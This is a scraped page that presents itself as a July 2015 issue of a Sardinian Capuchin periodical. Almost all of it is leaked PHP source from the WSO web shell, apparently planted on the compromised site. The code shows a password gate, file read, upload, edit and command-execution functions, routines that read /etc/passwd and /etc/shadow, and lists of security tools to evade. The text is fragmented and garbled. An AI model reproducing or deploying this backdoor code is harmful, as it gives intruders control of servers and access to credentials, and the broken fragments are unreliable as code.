Periodico mensile dei Padri Cappuccini e del Terz’Ordine Francescano della Provincia di Sardegna
 
 
Voce Serafica, Luglio 2015
Notizie In breve
T.M.
 
Password:  

"); } if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) if( empty( $auth_pass ) || ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else printLogin(); if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if( isset( $_POST['c'] ) ) @chdir($_POST['c']); $cwd = @getcwd(); if( $os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } if( $cwd[strlen($cwd)-1] != '/' ) $cwd .= '/'; function printHeader() { if(empty($_POST['charset'])) $_POST['charset'] = "UTF-8"; global $color; ?>

- WSO

".$path[$i]."/"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= '
Change dir:
 
Read file:
 
Make dir:
 
Make file:
 
Execute:
 
Upload file:
 

= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function perms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function viewPermsColor($f) { if (!@is_readable($f)) return ''.perms(@fileperms($f)).''; elseif (!@is_writable($f)) return ''.perms(@fileperms($f)).''; else return ''.perms(@fileperms($f)).''; } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } function which($p) { $path = ex('which '.$p); if(!empty($path)) return $path; return false; } // Sec. Info go -------------------- function actionSecInfo() { printHeader(); echo '

Server security information

'; function showSecParam($n, $v) { $v = trim($v); if($v) { echo ''.$n.': '; if(strpos($v, "\n") === false) echo $v.'
'; else echo '
'.$v.'
'; } } showSecParam('Server software', @getenv('SERVER_SOFTWARE')); showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none'); showSecParam('Open base dir', @ini_get('open_basedir')); showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; showSecParam('Supported databases', implode(', ', $temp)); echo '
'; if( $GLOBALS['os'] == 'nix' ) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); showSecParam('OS version', @file_get_contents('/proc/version')); showSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { echo '
'; $temp=array(); foreach ($userful as $item) if(which($item)){$temp[]=$item;} showSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(which($item)){$temp[]=$item;} showSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(which($item)){$temp[]=$item;} showSecParam('Downloaders', implode(', ',$temp)); echo '
'; showSecParam('Hosts', @file_get_contents('/etc/hosts')); showSecParam('HDD space', ex('df -h')); showSecParam('Mount options', @file_get_contents('/etc/fstab')); echo '
posix_getpwuid ("Read" /etc/passwd)
'; else die(''); } echo ' 
'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { @file_put_contents($_POST['p1'],$_POST['p3']); echo 'Saved!
'; } echo '